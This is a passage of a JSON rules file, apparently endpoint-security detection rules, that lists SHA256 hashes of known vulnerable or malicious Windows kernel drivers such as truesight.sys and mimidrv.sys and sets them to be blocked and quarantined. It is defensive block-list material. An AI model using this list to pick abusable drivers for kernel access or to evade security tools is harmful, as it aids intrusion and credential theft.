"references": [], + "type": "hash", + "value": "b0c557d14174aa4690efa1a2cac47c1ff8d31c4ddf83f437b36360cb51b2bb17", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "964c0ff5-2f26-5c7a-a318-dfbb2c216d2d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470192Z", + "creation_date": "2026-03-23T11:45:30.470195Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470205Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "951edade4ad00b185929c14622e5efcac1069cadaf6bcc945e744c30f069c9b9", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9655220e-adae-5fd0-b3f8-eef1b28611bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469806Z", + "creation_date": "2026-03-23T11:45:30.469810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469819Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"cbf98b321670fd17462e7ceb8a0d002b9a1474f8015d94ea267a942a2e20c80b", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "965e16ce-e6e8-5fa7-95f1-07a49921cf71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816555Z", + "creation_date": "2026-03-23T11:45:30.816557Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816563Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb3b45506d203aafb4ef28586c0655cd2e9095e6238a8ccf76ab6eb6113b4476", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9669b12d-935d-52a4-8d5d-fcebc01b711e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809158Z", + "creation_date": "2026-03-23T11:45:31.809161Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809169Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b0c0ebf75a563c07b8406d3946a927e3deb0d60a52600497e4a4eb9dbafe881", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "966baff3-3498-588c-9dbc-26038cc09bf0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828884Z", + "creation_date": "2026-03-23T11:45:31.828886Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ca8956df2fde0e7ab8fe9f0cc4e03a69b0ff18b39b1618e64ba989a4a14a14e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9676115c-425c-50d9-8d7b-f2a6834d1d86", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477225Z", + "creation_date": "2026-03-23T11:45:31.477228Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477237Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3515a69fdcd951f4aed637a3c3356378b56e32d79b7b597d7ae9cc1c153b3b7b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96795c8f-168d-5c6b-9ebe-59681a2b58c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808075Z", + "creation_date": 
"2026-03-23T11:45:31.808078Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "67891a95788e438cd8c1ad5cc8027092e57c081847d019ce33e0b304b9c6a5a3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96814314-afe0-504c-b038-7dbf0a8c48e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820530Z", + "creation_date": "2026-03-23T11:45:30.820532Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820537Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31add0358eb679d7c10ac1622403a85891bf764154280a589e71ccd297fc7a16", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"96835009-f048-5bf0-996a-7ec39ff0c995", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157084Z", + "creation_date": "2026-03-23T11:45:31.157086Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157091Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb492ba828682133959cac42660c30166e7e255d0e78bbd2a150457fc7688c3a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "969aa62d-de2e-5596-a0f8-8a9f52b95028", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478375Z", + "creation_date": "2026-03-23T11:45:30.478378Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.478426Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d44848d3e845f8293974e8b621b72a61ec00c8d3cf95fcf41698bbbd4bdf5565", + "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96b8e774-0125-5361-ade5-34375317bd0f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459624Z", + "creation_date": "2026-03-23T11:45:30.459627Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44a0599defea351314663582dbc61069b3a095a4ddad571bb17dd0d8b21e7ff2", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96bd207b-2388-5da8-bb30-67722ca910c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969292Z", + "creation_date": "2026-03-23T11:45:29.969294Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969299Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be8dd2d39a527649e34dc77ef8bc07193a4234b38597b8f51e519dadc5479ec2", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96cb1210-1437-5c22-a744-136a6c727149", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612832Z", + "creation_date": "2026-03-23T11:45:29.612834Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612840Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96d9105c-054d-5b4c-9566-77bf1d36e7a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150444Z", + "creation_date": "2026-03-23T11:45:31.150446Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150451Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77e42a3df51e106a8f7bc905e9b56b2d7a51fc72777a835d5c0e066be3c37279", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96d95ca0-26c8-5ddc-9a24-5fe0a96fb5f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477921Z", + "creation_date": "2026-03-23T11:45:30.477924Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4fc8f04721363f4b570accf700f507fb0b0381a81d3a8ffb768ded65978ac50", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96f1f46e-adfb-50a0-a6c6-96d811019e58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608189Z", + "creation_date": "2026-03-23T11:45:29.608191Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608196Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4127dace7354514f4698d94ba29affc9815c6d35b258883028c523fdba675218", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] 
[file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96f63ecc-b58c-5684-b828-acd7bc0975ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813245Z", + "creation_date": "2026-03-23T11:45:31.813248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d2749ad65ee9272ed72c9569371b056a2c16d89a63cee3c45bdb447e5e8fdbbf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96fb724b-9673-53d6-9c08-12b8fb41595a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156808Z", + "creation_date": "2026-03-23T11:45:31.156810Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156816Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f011a0917120872193694c73f03788e500b6fc80faea219d876366eb80777fbd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96fd1301-30e0-560a-ae4f-6ed92f391c68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616221Z", + "creation_date": "2026-03-23T11:45:29.616223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616228Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0", + "comment": "Huawei vulnerable BIOS update tool (aka Phymemx64.sys) [https://www.loldrivers.io/drivers/268e87ba-ad44-4f3c-986f-26712cac68da/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97030c91-da74-5db6-82f6-9315a1d5dacd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816039Z", + "creation_date": "2026-03-23T11:45:31.816042Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816050Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7942bc1c3c3699fc8ca271f42396f9f3115419fd2000bb2271e5c97baf9f0df2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9707d6ff-dc80-5fc4-9c74-80dbac1a6a28", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809701Z", + "creation_date": "2026-03-23T11:45:31.809705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809713Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "689ed52d962fb6e8467ae8acb861e54b67af81a43a09332f84487b7c5a7295ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "970dd668-8f04-5344-9ff9-d252646fe0d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477132Z", + "creation_date": "2026-03-23T11:45:31.477136Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c50bcdc8b656a8e4eb027cc9bdecde9839b1d264e28d396bd9444ff1fc1fa36", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97124aee-e046-5366-b6db-4583bd8351e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971951Z", + "creation_date": "2026-03-23T11:45:29.971953Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971958Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dec391d24c986f2d0af0fb680705e4d22ff6f1d8aeb2656c9e7159dd873d22fb", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9712c8aa-d212-596c-8fd9-e08ea37f5cb5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833261Z", + "creation_date": "2026-03-23T11:45:30.833265Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833273Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
